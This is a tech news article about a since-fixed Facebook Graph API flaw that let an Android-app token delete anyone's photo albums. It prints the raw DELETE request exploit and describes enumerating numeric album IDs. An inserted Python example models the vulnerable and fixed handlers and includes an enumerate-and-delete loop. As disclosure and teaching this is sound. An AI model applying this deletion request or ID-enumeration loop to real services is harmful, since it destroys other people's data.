How a hacker could delete every Facebook photo

Facebook probably holds the largest collection of photographs anywhere: about 350 million photos are uploaded to it from around the world every day.

Security researcher Laxman Muthiyah discovered a way that would have let him, had he wished, delete every photo ever uploaded to the popular social network.

Fortunately for Facebook and its 1.3 billion users, Muthiyah had no malicious intentions. He reported the bug to Facebook and received a $12,500 bounty.

To Facebook's credit, its response was immediate, and the bug was fixed across the network within 2 hours.

Laxman says:

OMG :D the album got deleted! So I got the key to delete all of your Facebook photos :P lol :D
Immediately reported this bug to the Facebook team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgment of the report.

Of course, Laxman had other options.

The bug he discovered is a weapon. It could not kill anyone, but it could have made hundreds of millions of people miserable.

Laxman could probably have sold the bug on the underground market and earned far more than he got from Facebook.

Or he could have kept his discovery secret and exploited it for his own benefit, as LizardSquad would have. Do you think that if LizardSquad had found the vulnerability they would have reported it to Facebook?

Laxman discovered the bug while examining Facebook's Graph API (Application Programming Interface).

The Graph API is what connects Facebook to websites, apps and anything else that needs to integrate with Facebook.

It is a lean interface driven by plain HTTP requests. It lets apps do the same things Facebook users do, and more.

Of course, API callers should never be able to modify or delete things that belong to someone else.

What Laxman found was a bug that let him do exactly that, simply by authenticating with an access token issued to the official Facebook for Android app.

The whole exploit was nothing more than a four-line HTTP request:

DELETE /<album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<attacker's Facebook for Android token>

Facebook's album IDs are numeric, so an attacker could simply start at 1 and keep counting until nothing was left. Faster still, a script could issue the request above in a loop over every ID from 1 up to a trillion. The root cause was a missing authorization check: the Graph API treated a valid token from the official Android app as sufficient to delete an album, without checking that the user the token was issued to actually owned the album named in the URL. Predictable object IDs plus a missing ownership check is the classic insecure direct object reference pattern.
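The following is an added example, not Facebook code and not Laxman's PoC. It models the flaw as a tiny in-memory Graph-API-style service: the vulnerable delete handler only checks that the token comes from a trusted app, the fixed handler also checks that the token's user owns the album, and an enumeration loop walks numeric IDs exactly as the paragraph above describes. The user names, album IDs, token structure and the `facebook_for_android` app label are all constructed here for illustration; how Facebook's real server decided to trust the token is an assumption based only on what the article says (the Android app's token worked where an ordinary app's did not).

```python
"""Added example (not Facebook's or Laxman Muthiyah's code).

Models the album-deletion authorization bug as a small in-memory service so
the vulnerable and fixed checks can be compared side by side. All data below
is constructed for the example.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Set


@dataclass
class Token:
    user: str  # the user the token was issued to (constructed)
    app: str   # the app that obtained the token (constructed label)


@dataclass
class GraphService:
    albums: Dict[int, str]  # album_id -> owning user (constructed)
    # Assumption for the example: the server treats a token from this app
    # label as "trusted", mirroring the article's Facebook for Android token.
    trusted_apps: Set[str] = field(default_factory=lambda: {"facebook_for_android"})

    def delete_album_vulnerable(self, album_id: int, token: Token) -> bool:
        """Vulnerable handler: checks the token's app, never the album owner."""
        if token.app not in self.trusted_apps:
            return False  # ordinary third-party app tokens are refused
        if album_id not in self.albums:
            return False  # nothing to delete at this ID
        del self.albums[album_id]  # any existing album is deleted, whoever owns it
        return True

    def delete_album_fixed(self, album_id: int, token: Token) -> bool:
        """Fixed handler: the caller must own the album named in the URL."""
        if token.app not in self.trusted_apps:
            return False
        owner = self.albums.get(album_id)
        if owner is None or owner != token.user:
            return False  # missing or not ours: same answer either way
        del self.albums[album_id]
        return True


def build_request(album_id: int, access_token: str) -> str:
    """Render the raw DELETE request the article shows, with a correct
    Content-Length computed from the body rather than the page's 245."""
    body = f"access_token={access_token}"
    return (
        f"DELETE /{album_id} HTTP/1.1\r\n"
        f"Host: graph.facebook.com\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"\r\n{body}"
    )


def enumerate_and_delete(
    token: Token,
    delete: Callable[[int, Token], bool],
    id_range: Iterable[int],
) -> List[int]:
    """Walk numeric IDs in order and return those the handler let us delete."""
    return [album_id for album_id in id_range if delete(album_id, token)]


def demo() -> Dict[str, List[int]]:
    """Run the same enumeration against both handlers and report what got deleted."""
    attacker = Token(user="mallory", app="facebook_for_android")
    albums = {1: "alice", 2: "bob", 3: "mallory", 4: "alice"}  # constructed

    vulnerable = GraphService(albums=dict(albums))
    fixed = GraphService(albums=dict(albums))
    return {
        "vulnerable_deleted": enumerate_and_delete(
            attacker, vulnerable.delete_album_vulnerable, range(1, 11)),
        "fixed_deleted": enumerate_and_delete(
            attacker, fixed.delete_album_fixed, range(1, 11)),
    }


if __name__ == "__main__":
    print(build_request(1, "<attacker token>"))
    print(demo())
```

The fixed handler returns the same failure for "album does not exist" and "album is not yours", so an enumerating attacker also cannot use the response to learn which IDs are in use.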

Guess the result.

See PoC

iGuRu.gr, The Best Technology Site in Greece


Written by giorgos

